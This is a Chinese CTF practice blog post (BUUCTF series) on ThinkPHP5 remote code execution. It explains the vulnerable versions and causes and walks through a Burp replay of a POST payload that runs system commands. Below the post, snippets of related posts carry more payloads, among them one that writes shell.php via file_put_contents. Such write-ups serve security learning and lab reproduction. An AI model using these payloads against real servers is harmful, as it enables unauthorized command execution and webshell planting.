thinkphp5-rce

已于 2024-05-17 18:48:04 修改
阅读量428 收藏 4
点赞数 5
分类专栏: BUUCTF练习题合集 文章标签: 网络安全
于 2024-05-17 15:27:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shierbai/article/details/139003845
版权

Thinkphp5

是快速,兼容,简单的轻量级国产php开发框架

例子:139.9.198.30:8089/index.php?s=fafa

应用:很多cms是基于thinkphp5二次开发的,所以出问题的话,会影响很多基于其开发的网站

信息收集:app:"ThinkPHP"

历史漏洞:

Thinkphp3.2.3缓存函数设计缺陷可导致getshell

Thinkphp5 sql注入漏洞和敏感信息泄露

Thinkphp3.2.3 最新版update注入漏洞

Thinkphp5.0.10缓存函数设计缺陷可导致getshell

Thinkphp3.2.X_find_select_delete注入

Thinkphp框架5.0.x sql注入漏洞分析

Thinkphp3.x_order_by注入漏洞

Thinkphp5.x_order_by注入漏洞

Thinkphp5.x_远程代码执行

漏洞利用

5.0.22/5.1.29

其版本5中,没有正确处理控制器名,导致网站在没有开启强制路由的情况下(默认情况)可以执行任意方法,从而导致远程命令执行漏洞。

5.0.23

此之前的版本中,获取method的方法没有正确处理方法名,攻击者可以调用request类任意方法并构造利用链,从而导致远程代码执行漏洞。

POST /index.php?s=captch

先对139.9.198.30:8089进行访问确认版本,url后加上/index.php?s=captch访问,抓包送重放器,

将包中get请求改成post请求,单击右键change request method,

包中放入以下内容

_method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=id(系统命令)

进行重放后回应包中显示对应信息

漏洞利用(批量)

GitHub - admintony/thinkPHPBatchPoc: thinkPHP代码执行批量检测工具

审计

ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路_thinkphp5 rce-CSDN博客

复制扫描结果payload,复制到url中,更改系统命令去执行我们的代码得到回显

payload:

ThinkPHP5系列远程代码执行漏洞复现(详细)_thinkphp 5.0.23 rce-CSDN博客

【CTF | 网络安全】攻防世界 php_rce 解题详析_ctf thinkphp v5-CSDN博客

效果如下

试了一下,没有,要么传个shell上去看看,要么直接phpinfo看

shierbai
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP5.0.5RCE
1stPeak's Blog
08-06 893
访问 http://xx.xx.xx.xx:8080/index.php/?s=captcha payload: _method=__construct&filter[]=system&method=GET&get[]=系统命令 示例如下: post传入_method=__construct&filter[]=system&method=GET&get[]=whoami进行命令执行 post传入_method=__construct&filter
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 531
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-23 1039
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
BUUCTF-thinkPHP5 RCE
朋克归零膏的博客
10-12 437
real题目我认为getflag是没意义的,幸运的是能从中学到一些技巧。在用大佬的poc对比官方的poc有一个细节。这题在尝试用命令执行写一句话的时候发现输入。,因此思路应该是将一句话分成两段然后拼一起。会被替换成空字符但是能单独写。
thinkphp5 rce
weixin_51558394的博客
08-17 443
thinkphp5 rce
Thinkphp 5-RCE漏洞复现
Tender*的博客
08-10 706
ThinkPHP5披露最多得漏洞就是RCE,其中的影响版本范围非常广漏洞原理其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。影响版本不同版本 payload 不同,且5.13版本后还与debug模式有关漏洞复现进入​。
thinkphp 5-rce版本漏洞复现(超详细版)
精品博客,你值得一看~
08-06 8341
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码。(3)还可以将php代码写入文件, 此处我们写一个phpinfo。(1)在url输出关于 PHP 配置的信息。说明存在远程命令执行漏洞!ip a #获取自己的本机 ip。(4)查看shell.php内容。直接访问 ip+端口。
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8303
ThinkPHP5系列远程代码执行漏洞复现(详细)
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
漏洞通告ThinkPHP远程代码执行漏洞
05-05
【漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
5. 在该漏洞中, `$dispatch` 变量将被设置为 `system`,导致 ThinkPHP 将执行系统命令 该漏洞的危害性非常高,因为它允许攻击者在服务器上执行任意代码,从而导致敏感数据泄露、服务器控制权劫持等问题。 为了...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x , 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2435
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
ThinkPHP 多语言模块RCE漏洞复现
0xSec
12-25 3589
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE
shelter1234567的博客
01-22 1172
本次我们继续以漏洞挖掘者的视角,来分析thinkphpRCE
ThinkPHP5 5.0.22/5.1.29 RCE
xhwfa的博客
05-02 3169
一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。 二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080,出现如
ThinkPHP6.0.12反序列化RCE挖掘
include_voidmain的博客
07-05 1868
ThinkPHP6.0.12反序列化RCE挖掘
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_34931142的博客
03-19 1237
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE)漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行正则表达式匹配。攻击者可以通过在请求中注入恶意的代码来执行任意的PHP代码。这个漏洞在ThinkPHP框架的Dispatcher类中的102行被触发。\[2\]\[3\] 为了修复这个漏洞,建议升级到最新版本的ThinkPHP框架,或者手动修复代码中的漏洞。具体修复方法包括使用更安全的正则表达式替代preg_replace函数,并且避免使用/e模式进行正则表达式匹配。此外,还应该对用户输入进行严格的过滤和验证,以防止恶意代码的注入。 #### 引用[.reference_title] - *1* [【漏洞复现】[ThinkPHP]2-Rce](https://blog.csdn.net/Mr_atopos/article/details/124907676)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ThinkPHP2-RCE漏洞复现](https://blog.csdn.net/qq_51459600/article/details/125179451)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值